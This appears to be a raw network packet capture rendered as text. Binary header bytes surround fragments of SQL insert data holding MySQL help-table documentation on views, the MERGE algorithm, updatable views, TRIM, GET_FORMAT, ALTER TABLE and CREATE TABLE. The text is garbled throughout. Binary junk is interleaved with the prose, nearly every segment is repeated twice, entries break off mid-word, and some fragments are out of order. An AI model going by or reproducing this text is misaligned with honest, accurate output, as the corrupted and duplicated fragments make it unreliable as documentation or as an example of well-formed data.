ZZBi0`EL@/܂Sŀo0E4@? 3 P)XY ) $C!bb0`BiET@/Ԁo0SE<*@@  3Pҟb   )ALGORITHM clause is present. The algorithm affects how MySQL\nprocesses the view.\n\nFor MERGE, the text of a statement that refers to the view and the view\ndefinition are merged such that parts of the view definition replace\ncorresponding parts of the statement.\n\nFor TEMPTABLE, the results from the view are retrieved into a\ntemporary table, which then is used to execute the statement.\n\nFor UNDEFINED, MySQL chooses which algorithm to use. It prefers\nMERGE over TEMPTABLE if possible, because MERGE is\nusually more efficient and because a view cannot be updatable if a temporary\ntable is used.\n\nA reason to choose TEMPTABLE explicitly is that locks can be released\non underlying tables after the temporary table has been created and before\nit is used to finish processing the statement. This might result in quicker\nlock release than the MERGE algorithm so that other clients that use\nthe view are not blocked as long.\n\nA view algorithm can be UNDEFINED three ways:\n\n\n --- No ALGORITHM clause is present in the CREATE VIEW statement.\n\n --- The CREATE VIEW statement has an explicit ALGORITHM = UNDEFINED\nclause.\n\n --- ALGORITHM = MERGE is specified for a view that can be processed only\nwith a temporary table. In this case, MySQL generates a warning andC!ZZ0`BiEL@/go0AE4@@ 3 P)XY ) $C%bbBi0`ET@/p܂Ao0E<*@?  3Pڟb   ) sets\nthe algorithm to UNDEFINED.\n\n\n\nAs mentioned earlier, MERGE is handled by merging corresponding parts\nof a view definition into the statement that refers to the view. The\nfollowing examples briefly illustrate how the MERGE algorithm works.\nThe examples assume that there is a view v_merge that has this\ndefinition:\n\nCREATE ALGORITHM = MERGE VIEW v_merge (vc1, vc2) AS\nSELECT c1, c2 FROM t WHERE c3 > 100;\n\nExample 1: Suppose that we issue this statement:\n\nSELECT * FROM v_merge;\n\nMySQL handles the statement as follows:\n\n\n --- v_merge becomes t\n\n --- * becomes vc1, vc2, which corresponds to c1, c2\n\n --- The view WHERE clause is added\n\n\nThe resulting statement to be executed becomes:\n\nSELECT c1, c2 FROM t WHERE c3 > 100;\n\nExample 2: Suppose that we issue this statement:\n\nSELECT * FROM v_merge WHERE vc1 < 100;\n\nThis statement is handled similarly to the previous one, except that\nvc1 < 100 becomes c1 < 100 and the view WHERE clause is\nadded to the statement WHERE clause using an AND connective\n(and parentheses are added to make sure the parts of the clause are executed\nwith correct precedence). The resulting statement to be executed becomes:\n\nSELECT c1, c2 FROM t WHERE (c3 > 100) AND (c1 < 100);\n\nEffectively, the statement to C%bb0`BiET@/Ԁo0SE<*@@  3Pڟb   ) sets\nthe algorithm to UNDEFINED.\n\n\n\nAs mentioned earlier, MERGE is handled by merging corresponding parts\nof a view definition into the statement that refers to the view. The\nfollowing examples briefly illustrate how the MERGE algorithm works.\nThe examples assume that there is a view v_merge that has this\ndefinition:\n\nCREATE ALGORITHM = MERGE VIEW v_merge (vc1, vc2) AS\nSELECT c1, c2 FROM t WHERE c3 > 100;\n\nExample 1: Suppose that we issue this statement:\n\nSELECT * FROM v_merge;\n\nMySQL handles the statement as follows:\n\n\n --- v_merge becomes t\n\n --- * becomes vc1, vc2, which corresponds to c1, c2\n\n --- The view WHERE clause is added\n\n\nThe resulting statement to be executed becomes:\n\nSELECT c1, c2 FROM t WHERE c3 > 100;\n\nExample 2: Suppose that we issue this statement:\n\nSELECT * FROM v_merge WHERE vc1 < 100;\n\nThis statement is handled similarly to the previous one, except that\nvc1 < 100 becomes c1 < 100 and the view WHERE clause is\nadded to the statement WHERE clause using an AND connective\n(and parentheses are added to make sure the parts of the clause are executed\nwith correct precedence). The resulting statement to be executed becomes:\n\nSELECT c1, c2 FROM t WHERE (c3 > 100) AND (c1 < 100);\n\nEffectively, the statement to C)bbBi0`ET@/p܂Ao0E<@?x}  3Pcٟtj $  )YEAR(\'1998-02-03\');\n -> 34',''),(137,'%',4,' MOD(N,M)\n N % M\n N MOD M\nModulo operation.\nReturns the remainder of N divided by M.\n','mysql> SELECT MOD(234, 10);\n -> 4\nmysql> SELECT 253 % 7;\n -> 1\nmysql> SELECT MOD(29,9);\n -> 2\nmysql> SELECT 29 MOD 9;\n -> 2',''),(138,'LONGTEXT',1,' LONGTEXT\n\nA TEXT column with a maximum length of 4,294,967,295 or\n4GB (2^32 - 1) characters. Up to MySQL\n3.23, the client/server protocol and MyISAM tables had a limit\nof 16MB per communication packet / table row. From MySQL 4.0, the maximum\nallowed length of LONGTEXT columns depends on the\nconfigured maximum packet size in the client/server protocol and available\nmemory.\n','',''),(139,'DISJOINT',11,' Disjoint(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially disjoint\nfrom (does not intersect) g2.\n','',''),(140,'KILL',6,'Each connection to mysqld runs in a separate thread. You can see\nwhich threads are running with the SHOW PROCESSLIST statement and kill\na thread with the KILL thread_id statement.\n\nAs of MySQL 5.0.0, KILL allows the optional CONNECTION or\nQUERY modifiers:\n\n\n --- KILL CONNECTION is the same as KILL with no modifier:\nIt terminates the connection associated with the given thread_id.C)bb0`BiET@/Ԁo0SE<@@w}  3Pcٟtj $  )YEAR(\'1998-02-03\');\n -> 34',''),(137,'%',4,' MOD(N,M)\n N % M\n N MOD M\nModulo operation.\nReturns the remainder of N divided by M.\n','mysql> SELECT MOD(234, 10);\n -> 4\nmysql> SELECT 253 % 7;\n -> 1\nmysql> SELECT MOD(29,9);\n -> 2\nmysql> SELECT 29 MOD 9;\n -> 2',''),(138,'LONGTEXT',1,' LONGTEXT\n\nA TEXT column with a maximum length of 4,294,967,295 or\n4GB (2^32 - 1) characters. Up to MySQL\n3.23, the client/server protocol and MyISAM tables had a limit\nof 16MB per communication packet / table row. From MySQL 4.0, the maximum\nallowed length of LONGTEXT columns depends on the\nconfigured maximum packet size in the client/server protocol and available\nmemory.\n','',''),(139,'DISJOINT',11,' Disjoint(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially disjoint\nfrom (does not intersect) g2.\n','',''),(140,'KILL',6,'Each connection to mysqld runs in a separate thread. You can see\nwhich threads are running with the SHOW PROCESSLIST statement and kill\na thread with the KILL thread_id statement.\n\nAs of MySQL 5.0.0, KILL allows the optional CONNECTION or\nQUERY modifiers:\n\n\n --- KILL CONNECTION is the same as KILL with no modifier:\nIt terminates the connection associated with the given thread_id.C#.bbBi0`ET@/p܂Ao0E<*@?  3P⟪b 9R  )be executed has a WHERE clause of this\nform:\n\nWHERE (select WHERE) AND (view WHERE)\n\nThe MERGE algorithm requires a one-to relationship between the rows\nin the view and the rows in the underlying table. If this relationship does\nnot hold, a temporary table must be used instead. Lack of a one-to-one\nrelationship occurs if the view contains any of a number of constructs:\n\n\n --- Aggregate functions (SUM(), MIN(), MAX(),\nCOUNT(), and so forth)\n\n --- DISTINCT\n\n --- GROUP BY\n\n --- HAVING\n\n --- UNION or UNION ALL\n\n --- Refers only to literal values (in this case, there is no underlying table)\n\n\nSome views are updatable. That is, you can use them in statements such as\nUPDATE, DELETE, or INSERT to update the contents of the\nunderlying table. For a view to be updatable, there must be a one-to\nrelationship between the rows in the view and the rows in the underlying\ntable. There are also certain other constructs that make a view\nnon-updatable. To be more specific, a view is not updatable if it contains\nany of the following:\n\n\n --- Aggregate functions (SUM(), MIN(), MAX(),\nCOUNT(), and so forth)\n\n --- DISTINCT\n\n --- GROUP BY\n\n --- HAVING\n\n --- UNION or UNION ALL\n\n --- Subquery in the select list\n\n --- Join\n\n --- Non-updatable vieC*.ZZBi0`EL@/܂Sŀo0E4@? 3 Pˀ)NF ) &C9.bb0`BiET@/Ԁo0SE<*@@  3P⟪b 9R  )be executed has a WHERE clause of this\nform:\n\nWHERE (select WHERE) AND (view WHERE)\n\nThe MERGE algorithm requires a one-to relationship between the rows\nin the view and the rows in the underlying table. If this relationship does\nnot hold, a temporary table must be used instead. Lack of a one-to-one\nrelationship occurs if the view contains any of a number of constructs:\n\n\n --- Aggregate functions (SUM(), MIN(), MAX(),\nCOUNT(), and so forth)\n\n --- DISTINCT\n\n --- GROUP BY\n\n --- HAVING\n\n --- UNION or UNION ALL\n\n --- Refers only to literal values (in this case, there is no underlying table)\n\n\nSome views are updatable. That is, you can use them in statements such as\nUPDATE, DELETE, or INSERT to update the contents of the\nunderlying table. For a view to be updatable, there must be a one-to\nrelationship between the rows in the view and the rows in the underlying\ntable. There are also certain other constructs that make a view\nnon-updatable. To be more specific, a view is not updatable if it contains\nany of the following:\n\n\n --- Aggregate functions (SUM(), MIN(), MAX(),\nCOUNT(), and so forth)\n\n --- DISTINCT\n\n --- GROUP BY\n\n --- HAVING\n\n --- UNION or UNION ALL\n\n --- Subquery in the select list\n\n --- Join\n\n --- Non-updatable vieCE.ZZ0`BiEL@/go0AE4@@ 3 Pˀ)NF ) &C2bbBi0`ET@/p܂Ao0E<*@?  3P"꟪b   )w in the FROM clause\n\n --- A subquery in the WHERE clause that refers to a table in the\nFROM clause\n\n --- Refers only to literal values (in this case, there is no underlying table to\nupdate)\n\n --- ALGORITHM = TEMPTABLE (use of a temporary table always makes a view\nnon-updatable)\n\n\nWith respect to insertability (being updatable with INSERT\nstatements), an updatable view is insertable if it also satisfies these\nadditional requirements for the view columns:\n\n\n --- There must be no duplicate view column names.\n\n --- The view must contain all columns in the base table that do not have a\ndefault value.\n\n --- The view columns must be simple column references and not derived columns.\nA derived column is one that is not a simple column reference but is derived\nfrom an expression. These are examples of derived columns:\n\n3.14159\ncol1 + 3\nUPPER(col2)\ncol3 / col4\n(subquery)\n\n\nA view that has a mix of simple column references and derived columns is not\ninsertable, but it can be updatable if you update only those columns that\nare not derived. Consider this view:\n\nCREATE VIEW v AS SELECT col1, 1 AS col2 FROM t;\n\nThis view is not insertable because col2 is derived from an\nexpression. But it is updatable if the update does not try to update\ncoC2bb0`BiET@/Ԁo0SE<*@@  3P"꟪b   )w in the FROM clause\n\n --- A subquery in the WHERE clause that refers to a table in the\nFROM clause\n\n --- Refers only to literal values (in this case, there is no underlying table to\nupdate)\n\n --- ALGORITHM = TEMPTABLE (use of a temporary table always makes a view\nnon-updatable)\n\n\nWith respect to insertability (being updatable with INSERT\nstatements), an updatable view is insertable if it also satisfies these\nadditional requirements for the view columns:\n\n\n --- There must be no duplicate view column names.\n\n --- The view must contain all columns in the base table that do not have a\ndefault value.\n\n --- The view columns must be simple column references and not derived columns.\nA derived column is one that is not a simple column reference but is derived\nfrom an expression. These are examples of derived columns:\n\n3.14159\ncol1 + 3\nUPPER(col2)\ncol3 / col4\n(subquery)\n\n\nA view that has a mix of simple column references and derived columns is not\ninsertable, but it can be updatable if you update only those columns that\nare not derived. Consider this view:\n\nCREATE VIEW v AS SELECT col1, 1 AS col2 FROM t;\n\nThis view is not insertable because col2 is derived from an\nexpression. But it is updatable if the update does not try to update\ncoC3ZZBi0`EL@/܂Sŀo0E4@? 3 Pۀ)D2 ) *C3ZZ0`BiEL@/go0AE4@@ 3 Pۀ)D2 ) *C6bbBi0`ET@/p܂Ao0E<*@?  3P'򟪮b   )l2. This update is allowable:\n\nUPDATE v SET col1 = 0;\n\nThis update is not allowable because it attempts to update a derived column:\n\nUPDATE v SET col2 = 0;\n\nIt is sometimes possible for a multiple-table view to be updatable, assuming\nthat it can be processed with the MERGE algorithm. For this to work,\nthe view must use an inner join (not an outer join or a UNION). Also,\nonly a single table in the view definition can be updated, so the SET\nclause must name only columns from one of the tables in the view. Views\nthat use UNION ALL are disallowed even though they might be\ntheoretically updatable, because the implementation uses temporary tables to\nprocess them.\n\n\nFor a multiple-table updatable view, INSERT can work if it inserts into a\nsingle table. DELETE is not supported.\n\nThe WITH CHECK OPTION clause can be given for an updatable view to\nprevent inserts or updates to rows except those for which the WHERE\nclause in the select_statement is true.\n','',''),(359,'TRIM',23,' TRIM([{BOTH | LEADING | TRAILING} [remstr] FROM] str)\n TRIM(remstr FROM] str)\nReturns the string str with all remstr prefixes and/or suffixes\nremoved. If none of the specifiers BOTH, LEADING, or\nTRAILING is given, BOTH is assumed. If remstr is optional\nand not specifiC6bb0`BiET@/Ԁo0SE<*@@  3P'򟪮b   )l2. This update is allowable:\n\nUPDATE v SET col1 = 0;\n\nThis update is not allowable because it attempts to update a derived column:\n\nUPDATE v SET col2 = 0;\n\nIt is sometimes possible for a multiple-table view to be updatable, assuming\nthat it can be processed with the MERGE algorithm. For this to work,\nthe view must use an inner join (not an outer join or a UNION). Also,\nonly a single table in the view definition can be updated, so the SET\nclause must name only columns from one of the tables in the view. Views\nthat use UNION ALL are disallowed even though they might be\ntheoretically updatable, because the implementation uses temporary tables to\nprocess them.\n\n\nFor a multiple-table updatable view, INSERT can work if it inserts into a\nsingle table. DELETE is not supported.\n\nThe WITH CHECK OPTION clause can be given for an updatable view to\nprevent inserts or updates to rows except those for which the WHERE\nclause in the select_statement is true.\n','',''),(359,'TRIM',23,' TRIM([{BOTH | LEADING | TRAILING} [remstr] FROM] str)\n TRIM(remstr FROM] str)\nReturns the string str with all remstr prefixes and/or suffixes\nremoved. If none of the specifiers BOTH, LEADING, or\nTRAILING is given, BOTH is assumed. If remstr is optional\nand not specifiC;bbBi0`ET@/p܂Ao0E<*@?  3P,b Ho  )ed, spaces are removed.\n','mysql> SELECT TRIM(\' bar \');\n -> \'bar\'\nmysql> SELECT TRIM(LEADING \'x\' FROM \'xxxbarxxx\');\n -> \'barxxx\'\nmysql> SELECT TRIM(BOTH \'x\' FROM \'xxxbarxxx\');\n -> \'bar\'\nmysql> SELECT TRIM(TRAILING \'xyz\' FROM \'barxxyz\');\n -> \'barx\'',''),(360,'IS',26,' IS boolean_value\n IS NOT boolean_value\nTests whether a value against a boolean value, where boolean_value can\nbe TRUE, FALSE, or UNKNOWN.\n','mysql> SELECT 1 IS TRUE, 0 IS FALSE, NULL IS UNKNOWN;\n -> 1, 1, 1\nmysql> SELECT 1 IS NOT UNKNOWN, 0 IS NOT UNKNOWN, NULL IS NOT UNKNOWN;\n -> 1, 1, 0',''),(361,'GET_FORMAT',14,' GET_FORMAT(DATE|TIME|DATETIME, \'EUR\'|\'USA\'|\'JIS\'|\'ISO\'|\'INTERNAL\')\nReturns a format string. This function is useful in combination with the\nDATE_FORMAT() and the STR_TO_DATE() functions.\nThe three possible values for the first argument\nand the five possible values for the second argument result in 15 possible\nformat strings (for the specifiers used, see the table in the\nDATE_FORMAT() function description).\n Function Call Result\n GET_FORMAT(DATE,\'USA\') \'%m.%d.%Y\'\n GET_FORMAT(DATE,\'JIS\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'ISO\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'EUR\'C;bb0`BiET@/Ԁo0SE<*@@  3P,b Ho  )ed, spaces are removed.\n','mysql> SELECT TRIM(\' bar \');\n -> \'bar\'\nmysql> SELECT TRIM(LEADING \'x\' FROM \'xxxbarxxx\');\n -> \'barxxx\'\nmysql> SELECT TRIM(BOTH \'x\' FROM \'xxxbarxxx\');\n -> \'bar\'\nmysql> SELECT TRIM(TRAILING \'xyz\' FROM \'barxxyz\');\n -> \'barx\'',''),(360,'IS',26,' IS boolean_value\n IS NOT boolean_value\nTests whether a value against a boolean value, where boolean_value can\nbe TRUE, FALSE, or UNKNOWN.\n','mysql> SELECT 1 IS TRUE, 0 IS FALSE, NULL IS UNKNOWN;\n -> 1, 1, 1\nmysql> SELECT 1 IS NOT UNKNOWN, 0 IS NOT UNKNOWN, NULL IS NOT UNKNOWN;\n -> 1, 1, 0',''),(361,'GET_FORMAT',14,' GET_FORMAT(DATE|TIME|DATETIME, \'EUR\'|\'USA\'|\'JIS\'|\'ISO\'|\'INTERNAL\')\nReturns a format string. This function is useful in combination with the\nDATE_FORMAT() and the STR_TO_DATE() functions.\nThe three possible values for the first argument\nand the five possible values for the second argument result in 15 possible\nformat strings (for the specifiers used, see the table in the\nDATE_FORMAT() function description).\n Function Call Result\n GET_FORMAT(DATE,\'USA\') \'%m.%d.%Y\'\n GET_FORMAT(DATE,\'JIS\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'ISO\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'EUR\'C>@bbBi0`ET@/p܂Ao0E<*@?  3P2b E  )) \'%d.%m.%Y\'\n GET_FORMAT(DATE,\'INTERNAL\') \'%Y%m%d\'\n GET_FORMAT(DATETIME,\'USA\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'JIS\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'ISO\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'EUR\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'INTERNAL\') \'%Y%m%d%H%i%s\'\n GET_FORMAT(TIME,\'USA\') \'%h:%i:%s %p\'\n GET_FORMAT(TIME,\'JIS\') \'%H:%i:%s\'\n GET_FORMAT(TIME,\'ISO\') \'%H:%i:%s\'\n GET_FORMAT(TIME,\'EUR\') \'%H.%i.%S\'\n GET_FORMAT(TIME,\'INTERNAL\') \'%H%i%s\'\n \nISO format is ISO 9075, not ISO 8601.\n\nAs of MySQL 4.1.4, TIMESTAMP can also be used;\nGET_FORMAT() returns the same values as for DATETIME.\n','mysql> SELECT DATE_FORMAT(\'2003-10-03\',GET_FORMAT(DATE,\'EUR\'));\n -> \'03.10.2003\'\nmysql> SELECT STR_TO_DATE(\'10.31.2003\',GET_FORMAT(DATE,\'USA\'));\n -> 2003-10-31\n@c Following is commented out because not yet implemented\n@c mysql> SET DATE_FORMAT=GET_FORMAT(DATE, \'USA\'); SELECT \'2003-10-31\';\n@c -> 10-31-2003',''),(362,'TINYBLOB',1,' TINYBLOB\n\nA BLOB column with a maximum length of 255\n(2^8 - 1) bytes.\n','',''),(363,'SAVEPOINT',10,'SAVEPOINT identifier\nROLLBACK TO SAVEPOINT identifier\n\nStarting from MySQL 4.0CZ@bb0`BiET@/Ԁo0SE<*@@  3P2b E  )) \'%d.%m.%Y\'\n GET_FORMAT(DATE,\'INTERNAL\') \'%Y%m%d\'\n GET_FORMAT(DATETIME,\'USA\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'JIS\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'ISO\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'EUR\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'INTERNAL\') \'%Y%m%d%H%i%s\'\n GET_FORMAT(TIME,\'USA\') \'%h:%i:%s %p\'\n GET_FORMAT(TIME,\'JIS\') \'%H:%i:%s\'\n GET_FORMAT(TIME,\'ISO\') \'%H:%i:%s\'\n GET_FORMAT(TIME,\'EUR\') \'%H.%i.%S\'\n GET_FORMAT(TIME,\'INTERNAL\') \'%H%i%s\'\n \nISO format is ISO 9075, not ISO 8601.\n\nAs of MySQL 4.1.4, TIMESTAMP can also be used;\nGET_FORMAT() returns the same values as for DATETIME.\n','mysql> SELECT DATE_FORMAT(\'2003-10-03\',GET_FORMAT(DATE,\'EUR\'));\n -> \'03.10.2003\'\nmysql> SELECT STR_TO_DATE(\'10.31.2003\',GET_FORMAT(DATE,\'USA\'));\n -> 2003-10-31\n@c Following is commented out because not yet implemented\n@c mysql> SET DATE_FORMAT=GET_FORMAT(DATE, \'USA\'); SELECT \'2003-10-31\';\n@c -> 10-31-2003',''),(362,'TINYBLOB',1,' TINYBLOB\n\nA BLOB column with a maximum length of 255\n(2^8 - 1) bytes.\n','',''),(363,'SAVEPOINT',10,'SAVEPOINT identifier\nROLLBACK TO SAVEPOINT identifier\n\nStarting from MySQL 4.0CAZZBi0`EL@/܂Sŀo0E4@? 3 P): ) ,CAZZ0`BiEL@/go0AE4@@ 3 P): ) ,CDbbBi0`ET@/p܂Ao0E<*@?  3P7 b @  ).14 and 4.1.1, InnoDB supports the SQL statements\nSAVEPOINT and ROLLBACK TO SAVEPOINT.\n','',''),(364,'IF',9,' IF(expr1,expr2,expr3)\nIf expr1 is TRUE (expr1 <> 0 and expr1 <> NULL) then\nIF() returns expr2, else it returns expr3.\nIF() returns a numeric or string value, depending on the context\nin which it is used.\n','mysql> SELECT IF(1>2,2,3);\n -> 3\nmysql> SELECT IF(1<2,\'yes\',\'no\');\n -> \'yes\'\nmysql> SELECT IF(STRCMP(\'test\',\'test1\'),\'no\',\'yes\');\n -> \'no\'',''),(365,'PURGE',6,'','PURGE MASTER LOGS TO \'mysql-bin.010\';\nPURGE MASTER LOGS BEFORE \'2003-04-02 22:46:26\';',''),(366,'USER',25,' USER()\n\nReturns the current MySQL username and hostname.\n','mysql> SELECT USER();\n -> \'davida@localhost\'',''),(367,'MPOINTFROMWKB',13,' MPointFromWKB(wkb[,srid])\n MultiPointFromWKB(wkb[,srid])\nConstructs a MULTIPOINT value using its WKB representation and SRID.\n','',''),(368,'ALTER TABLE',28,'ALTER TABLE allows you to change the structure of an existing table.\nFor example, you can add or delete columns, create or destroy indexes, change\nthe type of existing columns, or rename columns or the table itself. You can\nalso change the comment for the table and type of the table.\n','ALTER [IGNORE] TABLE tbl_name\n CDbb0`BiET@/Ԁo0SE<*@@  3P7 b @  ).14 and 4.1.1, InnoDB supports the SQL statements\nSAVEPOINT and ROLLBACK TO SAVEPOINT.\n','',''),(364,'IF',9,' IF(expr1,expr2,expr3)\nIf expr1 is TRUE (expr1 <> 0 and expr1 <> NULL) then\nIF() returns expr2, else it returns expr3.\nIF() returns a numeric or string value, depending on the context\nin which it is used.\n','mysql> SELECT IF(1>2,2,3);\n -> 3\nmysql> SELECT IF(1<2,\'yes\',\'no\');\n -> \'yes\'\nmysql> SELECT IF(STRCMP(\'test\',\'test1\'),\'no\',\'yes\');\n -> \'no\'',''),(365,'PURGE',6,'','PURGE MASTER LOGS TO \'mysql-bin.010\';\nPURGE MASTER LOGS BEFORE \'2003-04-02 22:46:26\';',''),(366,'USER',25,' USER()\n\nReturns the current MySQL username and hostname.\n','mysql> SELECT USER();\n -> \'davida@localhost\'',''),(367,'MPOINTFROMWKB',13,' MPointFromWKB(wkb[,srid])\n MultiPointFromWKB(wkb[,srid])\nConstructs a MULTIPOINT value using its WKB representation and SRID.\n','',''),(368,'ALTER TABLE',28,'ALTER TABLE allows you to change the structure of an existing table.\nFor example, you can add or delete columns, create or destroy indexes, change\nthe type of existing columns, or rename columns or the table itself. You can\nalso change the comment for the table and type of the table.\n','ALTER [IGNORE] TABLE tbl_name\n CHZZBi0`EL@/܂Sŀo0E4@? 3 P)0  ) 1CHZZ0`BiEL@/go0AE4@@ 3 P)0  ) 1CqJbbBi0`ET@/p܂Ao0E<*@?  3P<b LB  )alter_specification [, alter_specification] ...\n\nalter_specification:\n ADD [COLUMN] column_definition [FIRST | AFTER col_name ]\n | ADD [COLUMN] (column_definition,...)\n | ADD INDEX [index_name] [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n PRIMARY KEY [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n UNIQUE [index_name] [index_type] (index_col_name,...)\n | ADD [FULLTEXT|SPATIAL] [index_name] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n FOREIGN KEY [index_name] (index_col_name,...)\n [reference_definition]\n | ALTER [COLUMN] col_name {SET DEFAULT literal | DROP DEFAULT}\n | CHANGE [COLUMN] old_col_name column_definition\n [FIRST|AFTER col_name]\n | MODIFY [COLUMN] column_definition [FIRST | AFTER col_name]\n | DROP [COLUMN] col_name\n | DROP PRIMARY KEY\n | DROP INDEX index_name\n | DROP FOREIGN KEY fk_symbol\n | DISABLE KEYS\n | ENABLE KEYS\n | RENAME [TO] new_tbl_name\n | ORDER BY col_name\n | CONVERT TO CHARACTER SET charset_name [COLLATE collation_name]\n | [DEFAULT] CHARACTER SET charset_name [COLLATE collation_name]\n | DISCARD TABLESPACE\n | IMPORT TABLESPACE\n | table_options',''),(369,'CHAR BYTE',22,'CHAR BYTE is an alias for CHAR BINARY.\n','',''),(37CJbb0`BiET@/Ԁo0SE<*@@  3P<b LB  )alter_specification [, alter_specification] ...\n\nalter_specification:\n ADD [COLUMN] column_definition [FIRST | AFTER col_name ]\n | ADD [COLUMN] (column_definition,...)\n | ADD INDEX [index_name] [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n PRIMARY KEY [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n UNIQUE [index_name] [index_type] (index_col_name,...)\n | ADD [FULLTEXT|SPATIAL] [index_name] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n FOREIGN KEY [index_name] (index_col_name,...)\n [reference_definition]\n | ALTER [COLUMN] col_name {SET DEFAULT literal | DROP DEFAULT}\n | CHANGE [COLUMN] old_col_name column_definition\n [FIRST|AFTER col_name]\n | MODIFY [COLUMN] column_definition [FIRST | AFTER col_name]\n | DROP [COLUMN] col_name\n | DROP PRIMARY KEY\n | DROP INDEX index_name\n | DROP FOREIGN KEY fk_symbol\n | DISABLE KEYS\n | ENABLE KEYS\n | RENAME [TO] new_tbl_name\n | ORDER BY col_name\n | CONVERT TO CHARACTER SET charset_name [COLLATE collation_name]\n | [DEFAULT] CHARACTER SET charset_name [COLLATE collation_name]\n | DISCARD TABLESPACE\n | IMPORT TABLESPACE\n | table_options',''),(369,'CHAR BYTE',22,'CHAR BYTE is an alias for CHAR BINARY.\n','',''),(37CNbbBi0`ET@/p܂Ao0E<*@?  3PAb 7<  )0,'MERGE',7,'\n@menu\n* MERGE table problems:: MERGE Table Problems\n@end menu\n\nThe MERGE storage engine was introduced in MySQL 3.23.25. It\nis also known as the MRG_MyISAM engine.\n\nA MERGE table is a collection of identical MyISAM tables that\ncan be used as one. ``Identical\'\' means that all tables have\nidentical column and index information. You can\'t merge tables in which the\ncolumns are listed in a different order, don\'t have exactly the same columns, or\nhave the indexes in different order. However, any or all of the tables can be\ncompressed with myisampack.\nSee also : [myisampack, , myisampack].\nDifferences in table options such as AVG_ROW_LENGTH, MAX_ROWS,\nor PACK_KEYS do not matter.\n','mysql> CREATE TABLE t1 (\n -> a INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n -> message CHAR(20));\nmysql> CREATE TABLE t2 (\n -> a INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n -> message CHAR(20));\nmysql> INSERT INTO t1 (message) VALUES (\'Testing\'),(\'table\'),(\'t1\');\nmysql> INSERT INTO t2 (message) VALUES (\'Testing\'),(\'table\'),(\'t2\');\nmysql> CREATE TABLE total (\n -> a INT NOT NULL AUTO_INCREMENT,\n -> message CHAR(20), INDEX(a))\n -> TYPE=MERGE UNION=(t1,t2) INSERT_METHOD=LAST;',''),(371,'CREATE TABLCNZZBi0`EL@/Ao0E4@?  ֞Pg%O"lGy fmsCNZZBi0`EL@/܂Sŀo0E4@? 3 P )% ) 3CNbb0`BiET@/Ԁo0SE<*@@  3PAb 7<  )0,'MERGE',7,'\n@menu\n* MERGE table problems:: MERGE Table Problems\n@end menu\n\nThe MERGE storage engine was introduced in MySQL 3.23.25. It\nis also known as the MRG_MyISAM engine.\n\nA MERGE table is a collection of identical MyISAM tables that\ncan be used as one. ``Identical\'\' means that all tables have\nidentical column and index information. You can\'t merge tables in which the\ncolumns are listed in a different order, don\'t have exactly the same columns, or\nhave the indexes in different order. However, any or all of the tables can be\ncompressed with myisampack.\nSee also : [myisampack, , myisampack].\nDifferences in table options such as AVG_ROW_LENGTH, MAX_ROWS,\nor PACK_KEYS do not matter.\n','mysql> CREATE TABLE t1 (\n -> a INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n -> message CHAR(20));\nmysql> CREATE TABLE t2 (\n -> a INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n -> message CHAR(20));\nmysql> INSERT INTO t1 (message) VALUES (\'Testing\'),(\'table\'),(\'t1\');\nmysql> INSERT INTO t2 (message) VALUES (\'Testing\'),(\'table\'),(\'t2\');\nmysql> CREATE TABLE total (\n -> a INT NOT NULL AUTO_INCREMENT,\n -> message CHAR(20), INDEX(a))\n -> TYPE=MERGE UNION=(t1,t2) INSERT_METHOD=LAST;',''),(371,'CREATE TABLCNZZ0`BiEL@/o0˃2E4@@  ֞Pg%O"lGy fmsC OZZ0`BiEL@/go0AE4@@ 3 P )% ) 3C9SbbBi0`ET@/p܂Ao0E<*@?  3PF"b G  )E',28,'CREATE TABLE creates a table with the given name.\nYou must have the CREATE privilege for the table.\n\nRules for allowable table names are given in [Legal names].\nBy default, the table is created in the current database.\nAn error occurs if the table exists, if there is no current database,\nor if the database does not exist.\n','CREATE [TEMPORARY] TABLE [IF NOT EXISTS] tbl_name\n [(create_definition,...)]\n [table_options] [select_statement]',''),(372,'>',26,' >\nGreater than:\n','mysql> SELECT 2 > 2;\n -> 0',''),(373,'MICROSECOND',14,' MICROSECOND(expr)\n\nReturns the microseconds from the time or datetime expression expr as a\nnumber in the range from 0 to 999999.\n','mysql> SELECT MICROSECOND(\'12:00:00.123456\');\n -> 123456\nmysql> SELECT MICROSECOND(\'1997-12-31 23:59:59.000010\');\n -> 10',''),(374,'ANALYZE',7,'This statement analyzes and stores the key distribution for a table.\nDuring the analysis, the table is locked with a read lock. This works on\nMyISAM and BDB tables and (as of MySQL 4.0.13) InnoDB\ntables. For MyISAM tables, this\nstatement is equivalent to using myisamchk -a.\n\nMySQL uses the stored key distribution to decide the order in which\ntables should be joined when you perform a join on something otheCASZZBi0`EL@/Ao0E41@?Z  ePZ>!{ f`~CPSbb0`BiET@/Ԁo0SE<*@@  3PF"b G  )E',28,'CREATE TABLE creates a table with the given name.\nYou must have the CREATE privilege for the table.\n\nRules for allowable table names are given in [Legal names].\nBy default, the table is created in the current database.\nAn error occurs if the table exists, if there is no current database,\nor if the database does not exist.\n','CREATE [TEMPORARY] TABLE [IF NOT EXISTS] tbl_name\n [(create_definition,...)]\n [table_options] 